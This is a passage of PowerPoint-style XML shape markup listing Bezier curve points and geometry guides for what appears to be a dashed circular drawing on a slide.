                    <a:pt x="2031" y="1535"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2032" y="1533"/>
                    <a:pt x="2031" y="1531"/>
                    <a:pt x="2029" y="1530"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2027" y="1529"/>
                    <a:pt x="2024" y="1530"/>
                    <a:pt x="2023" y="1532"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2023" y="1532"/>
                    <a:pt x="2023" y="1532"/>
                    <a:pt x="2023" y="1532"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2040" y="1495"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2038" y="1501"/>
                    <a:pt x="2035" y="1507"/>
                    <a:pt x="2032" y="1513"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2031" y="1515"/>
                    <a:pt x="2032" y="1518"/>
                    <a:pt x="2034" y="1519"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2036" y="1520"/>
                    <a:pt x="2038" y="1519"/>
                    <a:pt x="2039" y="1517"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2042" y="1511"/>
                    <a:pt x="2045" y="1505"/>
                    <a:pt x="2048" y="1498"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2048" y="1496"/>
                    <a:pt x="2048" y="1494"/>
                    <a:pt x="2046" y="1493"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2044" y="1492"/>
                    <a:pt x="2041" y="1493"/>
                    <a:pt x="2040" y="1495"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2056" y="1458"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2053" y="1464"/>
                    <a:pt x="2051" y="1471"/>
                    <a:pt x="2048" y="1477"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2047" y="1479"/>
                    <a:pt x="2048" y="1481"/>
                    <a:pt x="2050" y="1482"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2052" y="1483"/>
                    <a:pt x="2055" y="1482"/>
                    <a:pt x="2056" y="1480"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2058" y="1474"/>
                    <a:pt x="2061" y="1467"/>
                    <a:pt x="2063" y="1461"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2064" y="1459"/>
                    <a:pt x="2063" y="1457"/>
                    <a:pt x="2061" y="1456"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2059" y="1455"/>
                    <a:pt x="2057" y="1456"/>
                    <a:pt x="2056" y="1458"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2070" y="1421"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2068" y="1427"/>
                    <a:pt x="2065" y="1433"/>
                    <a:pt x="2063" y="1440"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2062" y="1442"/>
                    <a:pt x="2063" y="1444"/>
                    <a:pt x="2065" y="1445"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2067" y="1446"/>
                    <a:pt x="2070" y="1444"/>
                    <a:pt x="2070" y="1442"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2073" y="1436"/>
                    <a:pt x="2075" y="1430"/>
                    <a:pt x="2077" y="1423"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2078" y="1421"/>
                    <a:pt x="2077" y="1419"/>
                    <a:pt x="2075" y="1418"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2073" y="1418"/>
                    <a:pt x="2070" y="1419"/>
                    <a:pt x="2070" y="1421"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2082" y="1383"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2080" y="1389"/>
                    <a:pt x="2078" y="1395"/>
                    <a:pt x="2076" y="1402"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2076" y="1404"/>
                    <a:pt x="2077" y="1406"/>
                    <a:pt x="2079" y="1407"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2081" y="1408"/>
                    <a:pt x="2083" y="1406"/>
                    <a:pt x="2084" y="1404"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2086" y="1398"/>
                    <a:pt x="2088" y="1392"/>
                    <a:pt x="2090" y="1385"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2091" y="1383"/>
                    <a:pt x="2089" y="1381"/>
                    <a:pt x="2087" y="1380"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2085" y="1379"/>
                    <a:pt x="2083" y="1381"/>
                    <a:pt x="2082" y="1383"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2093" y="1344"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2092" y="1351"/>
                    <a:pt x="2090" y="1357"/>
                    <a:pt x="2088" y="1364"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2087" y="1366"/>
                    <a:pt x="2089" y="1368"/>
                    <a:pt x="2091" y="1369"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2093" y="1369"/>
                    <a:pt x="2095" y="1368"/>
                    <a:pt x="2096" y="1366"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2098" y="1359"/>
                    <a:pt x="2099" y="1353"/>
                    <a:pt x="2101" y="1346"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2102" y="1344"/>
                    <a:pt x="2100" y="1342"/>
                    <a:pt x="2098" y="1342"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2096" y="1341"/>
                    <a:pt x="2094" y="1342"/>
                    <a:pt x="2093" y="1344"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2103" y="1306"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2102" y="1312"/>
                    <a:pt x="2100" y="1319"/>
                    <a:pt x="2098" y="1325"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2098" y="1327"/>
                    <a:pt x="2099" y="1329"/>
                    <a:pt x="2101" y="1330"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2103" y="1330"/>
                    <a:pt x="2106" y="1329"/>
                    <a:pt x="2106" y="1327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2108" y="1321"/>
                    <a:pt x="2109" y="1314"/>
                    <a:pt x="2111" y="1307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2111" y="1305"/>
                    <a:pt x="2110" y="1303"/>
                    <a:pt x="2108" y="1303"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2106" y="1302"/>
                    <a:pt x="2104" y="1304"/>
                    <a:pt x="2103" y="1306"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2111" y="1267"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2110" y="1273"/>
                    <a:pt x="2109" y="1280"/>
                    <a:pt x="2107" y="1286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2107" y="1288"/>
                    <a:pt x="2108" y="1290"/>
                    <a:pt x="2110" y="1291"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2113" y="1291"/>
                    <a:pt x="2115" y="1290"/>
                    <a:pt x="2115" y="1288"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2116" y="1281"/>
                    <a:pt x="2118" y="1275"/>
                    <a:pt x="2119" y="1268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2119" y="1266"/>
                    <a:pt x="2118" y="1264"/>
                    <a:pt x="2116" y="1263"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2114" y="1263"/>
                    <a:pt x="2112" y="1264"/>
                    <a:pt x="2111" y="1267"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2118" y="1227"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2117" y="1234"/>
                    <a:pt x="2116" y="1240"/>
                    <a:pt x="2115" y="1247"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2114" y="1249"/>
                    <a:pt x="2116" y="1251"/>
                    <a:pt x="2118" y="1252"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2120" y="1252"/>
                    <a:pt x="2122" y="1251"/>
                    <a:pt x="2123" y="1248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2124" y="1242"/>
                    <a:pt x="2125" y="1235"/>
                    <a:pt x="2126" y="1228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2126" y="1226"/>
                    <a:pt x="2125" y="1224"/>
                    <a:pt x="2122" y="1224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2120" y="1224"/>
                    <a:pt x="2118" y="1225"/>
                    <a:pt x="2118" y="1227"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2123" y="1188"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2122" y="1194"/>
                    <a:pt x="2122" y="1201"/>
                    <a:pt x="2121" y="1208"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2120" y="1210"/>
                    <a:pt x="2122" y="1212"/>
                    <a:pt x="2124" y="1212"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2126" y="1212"/>
                    <a:pt x="2128" y="1211"/>
                    <a:pt x="2129" y="1209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2129" y="1202"/>
                    <a:pt x="2130" y="1195"/>
                    <a:pt x="2131" y="1189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2131" y="1186"/>
                    <a:pt x="2130" y="1184"/>
                    <a:pt x="2127" y="1184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2125" y="1184"/>
                    <a:pt x="2123" y="1186"/>
                    <a:pt x="2123" y="1188"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2127" y="1148"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2126" y="1155"/>
                    <a:pt x="2126" y="1161"/>
                    <a:pt x="2125" y="1168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2125" y="1170"/>
                    <a:pt x="2127" y="1172"/>
                    <a:pt x="2129" y="1172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2131" y="1172"/>
                    <a:pt x="2133" y="1171"/>
                    <a:pt x="2133" y="1169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2134" y="1162"/>
                    <a:pt x="2134" y="1155"/>
                    <a:pt x="2135" y="1149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2135" y="1146"/>
                    <a:pt x="2133" y="1144"/>
                    <a:pt x="2131" y="1144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2129" y="1144"/>
                    <a:pt x="2127" y="1146"/>
                    <a:pt x="2127" y="1148"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2129" y="1108"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2129" y="1115"/>
                    <a:pt x="2128" y="1121"/>
                    <a:pt x="2128" y="1128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2128" y="1130"/>
                    <a:pt x="2130" y="1132"/>
                    <a:pt x="2132" y="1132"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2134" y="1132"/>
                    <a:pt x="2136" y="1131"/>
                    <a:pt x="2136" y="1129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2136" y="1122"/>
                    <a:pt x="2137" y="1115"/>
                    <a:pt x="2137" y="1108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2137" y="1106"/>
                    <a:pt x="2135" y="1104"/>
                    <a:pt x="2133" y="1104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2131" y="1104"/>
                    <a:pt x="2129" y="1106"/>
                    <a:pt x="2129" y="1108"/>
                  </a:cubicBezTo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9"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4527435" y="2757226"/>
              <a:ext cx="3214033" cy="3213398"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2132 w 2138"/>
                <a:gd name="T1" fmla="*/ 1011 h 2138"/>
                <a:gd name="T2" fmla="*/ 2118 w 2138"/>
                <a:gd name="T3" fmla="*/ 908 h 2138"/>
                <a:gd name="T4" fmla="*/ 2096 w 2138"/>
                <a:gd name="T5" fmla="*/ 786 h 2138"/>
                <a:gd name="T6" fmla="*/ 2068 w 2138"/>
                <a:gd name="T7" fmla="*/ 699 h 2138"/>
                <a:gd name="T8" fmla="*/ 2005 w 2138"/>
                <a:gd name="T9" fmla="*/ 570 h 2138"/>
                <a:gd name="T10" fmla="*/ 1965 w 2138"/>
                <a:gd name="T11" fmla="*/ 501 h 2138"/>
                <a:gd name="T12" fmla="*/ 1896 w 2138"/>
                <a:gd name="T13" fmla="*/ 398 h 2138"/>
                <a:gd name="T14" fmla="*/ 1821 w 2138"/>
                <a:gd name="T15" fmla="*/ 309 h 2138"/>
                <a:gd name="T16" fmla="*/ 1747 w 2138"/>
                <a:gd name="T17" fmla="*/ 248 h 2138"/>
                <a:gd name="T18" fmla="*/ 1627 w 2138"/>
                <a:gd name="T19" fmla="*/ 167 h 2138"/>
                <a:gd name="T20" fmla="*/ 1558 w 2138"/>
                <a:gd name="T21" fmla="*/ 127 h 2138"/>
                <a:gd name="T22" fmla="*/ 1446 w 2138"/>
                <a:gd name="T23" fmla="*/ 73 h 2138"/>
                <a:gd name="T24" fmla="*/ 1336 w 2138"/>
                <a:gd name="T25" fmla="*/ 34 h 2138"/>
                <a:gd name="T26" fmla="*/ 1238 w 2138"/>
                <a:gd name="T27" fmla="*/ 14 h 2138"/>
                <a:gd name="T28" fmla="*/ 1122 w 2138"/>
                <a:gd name="T29" fmla="*/ 6 h 2138"/>
                <a:gd name="T30" fmla="*/ 1014 w 2138"/>
                <a:gd name="T31" fmla="*/ 6 h 2138"/>
                <a:gd name="T32" fmla="*/ 919 w 2138"/>
                <a:gd name="T33" fmla="*/ 19 h 2138"/>
                <a:gd name="T34" fmla="*/ 821 w 2138"/>
                <a:gd name="T35" fmla="*/ 37 h 2138"/>
                <a:gd name="T36" fmla="*/ 703 w 2138"/>
                <a:gd name="T37" fmla="*/ 64 h 2138"/>
                <a:gd name="T38" fmla="*/ 616 w 2138"/>
                <a:gd name="T39" fmla="*/ 105 h 2138"/>
                <a:gd name="T40" fmla="*/ 510 w 2138"/>
                <a:gd name="T41" fmla="*/ 168 h 2138"/>
                <a:gd name="T42" fmla="*/ 396 w 2138"/>
                <a:gd name="T43" fmla="*/ 249 h 2138"/>
                <a:gd name="T44" fmla="*/ 337 w 2138"/>
                <a:gd name="T45" fmla="*/ 302 h 2138"/>
                <a:gd name="T46" fmla="*/ 249 w 2138"/>
                <a:gd name="T47" fmla="*/ 384 h 2138"/>
                <a:gd name="T48" fmla="*/ 188 w 2138"/>
                <a:gd name="T49" fmla="*/ 464 h 2138"/>
                <a:gd name="T50" fmla="*/ 132 w 2138"/>
                <a:gd name="T51" fmla="*/ 571 h 2138"/>
                <a:gd name="T52" fmla="*/ 75 w 2138"/>
                <a:gd name="T53" fmla="*/ 698 h 2138"/>
                <a:gd name="T54" fmla="*/ 45 w 2138"/>
                <a:gd name="T55" fmla="*/ 777 h 2138"/>
                <a:gd name="T56" fmla="*/ 15 w 2138"/>
                <a:gd name="T57" fmla="*/ 890 h 2138"/>
                <a:gd name="T58" fmla="*/ 3 w 2138"/>
                <a:gd name="T59" fmla="*/ 990 h 2138"/>
                <a:gd name="T60" fmla="*/ 5 w 2138"/>
                <a:gd name="T61" fmla="*/ 1106 h 2138"/>
                <a:gd name="T62" fmla="*/ 20 w 2138"/>
                <a:gd name="T63" fmla="*/ 1229 h 2138"/>
                <a:gd name="T64" fmla="*/ 50 w 2138"/>
                <a:gd name="T65" fmla="*/ 1365 h 2138"/>
                <a:gd name="T66" fmla="*/ 75 w 2138"/>
                <a:gd name="T67" fmla="*/ 1441 h 2138"/>
                <a:gd name="T68" fmla="*/ 107 w 2138"/>
                <a:gd name="T69" fmla="*/ 1536 h 2138"/>
                <a:gd name="T70" fmla="*/ 173 w 2138"/>
                <a:gd name="T71" fmla="*/ 1636 h 2138"/>
                <a:gd name="T72" fmla="*/ 230 w 2138"/>
                <a:gd name="T73" fmla="*/ 1718 h 2138"/>
                <a:gd name="T74" fmla="*/ 302 w 2138"/>
                <a:gd name="T75" fmla="*/ 1814 h 2138"/>
                <a:gd name="T76" fmla="*/ 375 w 2138"/>
                <a:gd name="T77" fmla="*/ 1877 h 2138"/>
                <a:gd name="T78" fmla="*/ 493 w 2138"/>
                <a:gd name="T79" fmla="*/ 1960 h 2138"/>
                <a:gd name="T80" fmla="*/ 563 w 2138"/>
                <a:gd name="T81" fmla="*/ 2006 h 2138"/>
                <a:gd name="T82" fmla="*/ 648 w 2138"/>
                <a:gd name="T83" fmla="*/ 2052 h 2138"/>
                <a:gd name="T84" fmla="*/ 759 w 2138"/>
                <a:gd name="T85" fmla="*/ 2088 h 2138"/>
                <a:gd name="T86" fmla="*/ 900 w 2138"/>
                <a:gd name="T87" fmla="*/ 2116 h 2138"/>
                <a:gd name="T88" fmla="*/ 983 w 2138"/>
                <a:gd name="T89" fmla="*/ 2130 h 2138"/>
                <a:gd name="T90" fmla="*/ 1079 w 2138"/>
                <a:gd name="T91" fmla="*/ 2138 h 2138"/>
                <a:gd name="T92" fmla="*/ 1218 w 2138"/>
                <a:gd name="T93" fmla="*/ 2119 h 2138"/>
                <a:gd name="T94" fmla="*/ 1297 w 2138"/>
                <a:gd name="T95" fmla="*/ 2105 h 2138"/>
                <a:gd name="T96" fmla="*/ 1415 w 2138"/>
                <a:gd name="T97" fmla="*/ 2081 h 2138"/>
                <a:gd name="T98" fmla="*/ 1505 w 2138"/>
                <a:gd name="T99" fmla="*/ 2036 h 2138"/>
                <a:gd name="T100" fmla="*/ 1593 w 2138"/>
                <a:gd name="T101" fmla="*/ 1991 h 2138"/>
                <a:gd name="T102" fmla="*/ 1682 w 2138"/>
                <a:gd name="T103" fmla="*/ 1945 h 2138"/>
                <a:gd name="T104" fmla="*/ 1771 w 2138"/>
                <a:gd name="T105" fmla="*/ 1864 h 2138"/>
                <a:gd name="T106" fmla="*/ 1843 w 2138"/>
                <a:gd name="T107" fmla="*/ 1794 h 2138"/>
                <a:gd name="T108" fmla="*/ 1925 w 2138"/>
                <a:gd name="T109" fmla="*/ 1702 h 2138"/>
                <a:gd name="T110" fmla="*/ 1982 w 2138"/>
                <a:gd name="T111" fmla="*/ 1624 h 2138"/>
                <a:gd name="T112" fmla="*/ 2040 w 2138"/>
                <a:gd name="T113" fmla="*/ 1496 h 2138"/>
                <a:gd name="T114" fmla="*/ 2075 w 2138"/>
                <a:gd name="T115" fmla="*/ 1419 h 2138"/>
                <a:gd name="T116" fmla="*/ 2106 w 2138"/>
                <a:gd name="T117" fmla="*/ 1328 h 2138"/>
                <a:gd name="T118" fmla="*/ 2124 w 2138"/>
                <a:gd name="T119" fmla="*/ 1213 h 2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38" h="2138">
                  <a:moveTo>
                    <a:pt x="2130" y="1067"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2130" y="1068"/>
                    <a:pt x="2130" y="1068"/>
                    <a:pt x="2130" y="1069"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2130" y="1076"/>
                    <a:pt x="2130" y="1082"/>
                    <a:pt x="2130" y="1089"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2129" y="1091"/>
                    <a:pt x="2131" y="1093"/>
                    <a:pt x="2133" y="1093"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2136" y="1093"/>
                    <a:pt x="2137" y="1091"/>
                    <a:pt x="2138" y="1089"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2138" y="1082"/>
                    <a:pt x="2138" y="1076"/>
                    <a:pt x="2138" y="1069"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2138" y="1068"/>
                    <a:pt x="2138" y="1068"/>
                    <a:pt x="2138" y="1067"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2138" y="1065"/>
                    <a:pt x="2136" y="1063"/>
                    <a:pt x="2134" y="1063"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2131" y="1063"/>
                    <a:pt x="2130" y="1065"/>
                    <a:pt x="2130" y="1067"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2129" y="1027"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2129" y="1034"/>
                    <a:pt x="2129" y="1041"/>
                    <a:pt x="2129" y="1047"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2130" y="1050"/>
                    <a:pt x="2131" y="1051"/>
                    <a:pt x="2134" y="1051"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2136" y="1051"/>
                    <a:pt x="2138" y="1049"/>
                    <a:pt x="2137" y="1047"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2137" y="1041"/>
                    <a:pt x="2137" y="1034"/>
                    <a:pt x="2137" y="1027"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2137" y="1025"/>
                    <a:pt x="2135" y="1023"/>
                    <a:pt x="2133" y="1023"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2131" y="1023"/>
                    <a:pt x="2129" y="1025"/>
                    <a:pt x="2129" y="1027"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2129" y="1027"/>
                    <a:pt x="2129" y="1027"/>
                    <a:pt x="2129" y="1027"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2127" y="988"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2127" y="994"/>
                    <a:pt x="2128" y="1001"/>
                    <a:pt x="2128" y="1008"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2128" y="1010"/>
                    <a:pt x="2130" y="1011"/>
                    <a:pt x="2132" y="1011"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2134" y="1011"/>
                    <a:pt x="2136" y="1009"/>
                    <a:pt x="2136" y="1007"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2136" y="1000"/>
                    <a:pt x="2135" y="994"/>
                    <a:pt x="2135" y="987"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2134" y="985"/>
                    <a:pt x="2133" y="983"/>
                    <a:pt x="2130" y="983"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2128" y="984"/>
                    <a:pt x="2126" y="985"/>
                    <a:pt x="2127" y="988"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2123" y="948"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2124" y="955"/>
                    <a:pt x="2124" y="961"/>
                    <a:pt x="2125" y="968"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2125" y="970"/>
                    <a:pt x="2127" y="972"/>
                    <a:pt x="2129" y="971"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2131" y="971"/>
                    <a:pt x="2133" y="969"/>
                    <a:pt x="2133" y="967"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2132" y="960"/>
                    <a:pt x="2132" y="954"/>
                    <a:pt x="2131" y="947"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2131" y="945"/>
                    <a:pt x="2129" y="943"/>
                    <a:pt x="2126" y="944"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2124" y="944"/>
                    <a:pt x="2123" y="946"/>
                    <a:pt x="2123" y="948"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2123" y="948"/>
                    <a:pt x="2123" y="948"/>
                    <a:pt x="2123" y="948"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2118" y="908"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2119" y="915"/>
                    <a:pt x="2120" y="922"/>
                    <a:pt x="2120" y="928"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2121" y="930"/>
                    <a:pt x="2123" y="932"/>
                    <a:pt x="2125" y="932"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2127" y="931"/>
                    <a:pt x="2129" y="929"/>
                    <a:pt x="2128" y="927"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2127" y="920"/>
                    <a:pt x="2127" y="914"/>
                    <a:pt x="2126" y="907"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2125" y="905"/>
                    <a:pt x="2123" y="903"/>
                    <a:pt x="2121" y="904"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2119" y="904"/>
                    <a:pt x="2117" y="906"/>
                    <a:pt x="2118" y="908"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2118" y="908"/>
                    <a:pt x="2118" y="908"/>
                    <a:pt x="2118" y="908"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2111" y="869"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2112" y="876"/>
                    <a:pt x="2113" y="882"/>
                    <a:pt x="2114" y="889"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2115" y="891"/>
                    <a:pt x="2117" y="892"/>
                    <a:pt x="2119" y="892"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2121" y="892"/>
                    <a:pt x="2123" y="890"/>
                    <a:pt x="2122" y="887"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2121" y="881"/>
                    <a:pt x="2120" y="874"/>
                    <a:pt x="2119" y="868"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2118" y="865"/>
                    <a:pt x="2116" y="864"/>
                    <a:pt x="2114" y="864"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2112" y="865"/>
                    <a:pt x="2110" y="867"/>
                    <a:pt x="2111" y="869"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2103" y="830"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2104" y="836"/>
                    <a:pt x="2106" y="843"/>
                    <a:pt x="2107" y="849"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2107" y="852"/>
                    <a:pt x="2110" y="853"/>
                    <a:pt x="2112" y="853"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2114" y="852"/>
                    <a:pt x="2115" y="850"/>
                    <a:pt x="2115" y="848"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2113" y="841"/>
                    <a:pt x="2112" y="835"/>
                    <a:pt x="2110" y="828"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2110" y="826"/>
                    <a:pt x="2108" y="825"/>
                    <a:pt x="2106" y="825"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2104" y="826"/>
                    <a:pt x="2102" y="828"/>
                    <a:pt x="2103" y="830"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2093" y="791"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2095" y="798"/>
                    <a:pt x="2096" y="804"/>
                    <a:pt x="2098" y="811"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2099" y="813"/>
                    <a:pt x="2101" y="814"/>
                    <a:pt x="2103" y="814"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2105" y="813"/>
                    <a:pt x="2106" y="811"/>
                    <a:pt x="2106" y="809"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2104" y="802"/>
                    <a:pt x="2102" y="796"/>
